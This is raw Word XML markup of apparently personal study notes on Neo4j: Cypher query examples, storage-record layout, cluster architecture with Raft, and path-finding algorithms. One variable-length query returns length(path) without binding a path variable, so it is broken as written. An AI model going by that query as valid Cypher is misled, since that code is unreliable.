    <w:p w14:paraId="6C2D12D7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1838A53D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>// Simple query: find Alice's friends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027D4A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (p:Person {name: "Alice"})-[:FRIENDS_WITH]-&gt;(friend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2314D232" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN friend.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D09A5C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0DBE9F3B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Friends of friends (2 hops)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EF4BCF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (p:Person {name: "Alice"})-[:FRIENDS_WITH*2]-&gt;(fof)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3C38F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>WHERE fof &lt;&gt; p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606128E0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN DISTINCT fof.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A037A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="20141A97" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Variable-length path (1 to 5 hops)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CE055" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (p:Person {name: "Alice"})-[:FRIENDS_WITH*1..5]-&gt;(connected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2646EFAD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN connected.name, length(path) as distance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A658EAD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="751F399E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Shortest path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F25A22" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH path = shortestPath(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7178AE61" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (alice:Person {name: "Alice"})-[:FRIENDS_WITH*..10]-(bob:Person {name: "Bob"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6ABE3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BCE5A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN path, length(path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC213E0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="66814FAA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Pattern matching: find people who work at the same company</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA1E0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (p1:Person)-[:WORKS_AT]-&gt;(c:Company)&lt;-[:WORKS_AT]-(p2:Person)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBFA4C7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>WHERE p1 &lt;&gt; p2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462127C8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN p1.name, p2.name, c.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFF40F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7642931A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Recommendation: find skills of Alice's friends that Alice doesn't have</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73123A5D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (alice:Person {name: "Alice"})-[:FRIENDS_WITH]-&gt;(friend)-[:HAS_SKILL]-&gt;(skill)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55F926" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>WHERE NOT (alice)-[:HAS_SKILL]-&gt;(skill)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643E7EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN skill.name, COUNT(friend) as friends_with_skill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624F64A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ORDER BY friends_with_skill DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03095F83" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>LIMIT 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1C3FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Neo4j Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE87882" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Storage Engine (Index-Free Adjacency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A63FB88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B53DE3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Node Store (fixed-size records):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14111F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌──────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E19C11" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ Node Record (15 bytes):                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D0ECC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - In-use flag (1 bit)                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D5AAF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - First relationship ID (pointer)               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ACDCB7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - First property ID (pointer)                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C3CF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - Labels pointer                                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB7319" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - Flags                                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DB55BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└──────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074C3FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4A8FD80A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Relationship Store (fixed-size records):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5FDFB6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌──────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7816080E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ Relationship Record (34 bytes):                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FF11C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - Start node ID                                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30116191" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - End node ID                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8B977" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - Relationship type                             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FDE87" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - Next relationship for start node (pointer)    │  ← linked list!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118A1C8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - Next relationship for end node (pointer)      │  ← linked list!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69034D18" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - First property ID                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB190F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>└──────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D127E17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How traversal works (O(1) per hop):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BFA99" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74496292" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>1. Start at Alice's node record (by ID or index lookup).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E577493" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2. Alice's node has "first relationship" pointer → follow it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1FF6DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>3. Relationship record says: "Alice -FRIENDS_WITH-&gt; Bob (node ID 7)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314E0607" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>4. Relationship also has "next relationship" pointer → follow to Alice's next relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A058D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>5. Repeat until all relationships traversed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C39EE1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="36B30178" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>No index scan. No JOIN. Just following pointers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4C295F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Each hop = 1 pointer dereference = ~nanoseconds (if in memory) or ~microseconds (if on disk).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DBCDA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Neo4j Cluster Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D0C41" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C073C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Neo4j Causal Cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2E58BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌──────────────┐     ┌──────────────┐     ┌──────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F69F4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│    Core 1    │</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Core 2    </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Core 3    </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3160BC4A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  (Leader)    │     │ (Follower)   │     │ (Follower)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67242617" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  Reads+Writes│     │  Reads       │     │  Reads       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D63DEF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└──────────────┘     └──────────────┘     └──────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612E425" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC7560D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                     ┌──────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D1F2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                     │  Read       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE18492" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                     │  Replicas   │  (async, for read scaling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7A79B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                     └─────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D5EBF4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="73C9D936" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Raft consensus for core members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219EEA33" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Leader handles writes, replicates to followers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B6A7C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Read replicas: eventually consistent, read scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47810D95" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Graph Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF2F49B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Path Finding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9EB23A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cypher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162845B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Shortest path (BFS — unweighted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22068359" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH path = shortestPath((a:Person {name:"Alice"})-[*..15]-(b:Person {name:"Dave"}))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE9C452" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D7993" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1ACDB294" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Dijkstra's (weighted shortest path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604897C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (a:City {name:"NYC"}), (b:City {name:"LA"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2A599" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CALL gds.shortestPath.dijkstra.stream({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C7BA4C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  sourceNode: a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742B5AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  targetNode: b,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15406CF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  relationshipWeightProperty: 'distance'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A00AC7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA5B19" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>YIELD path, totalCost</w:t>
      </w:r>
    </w:p>
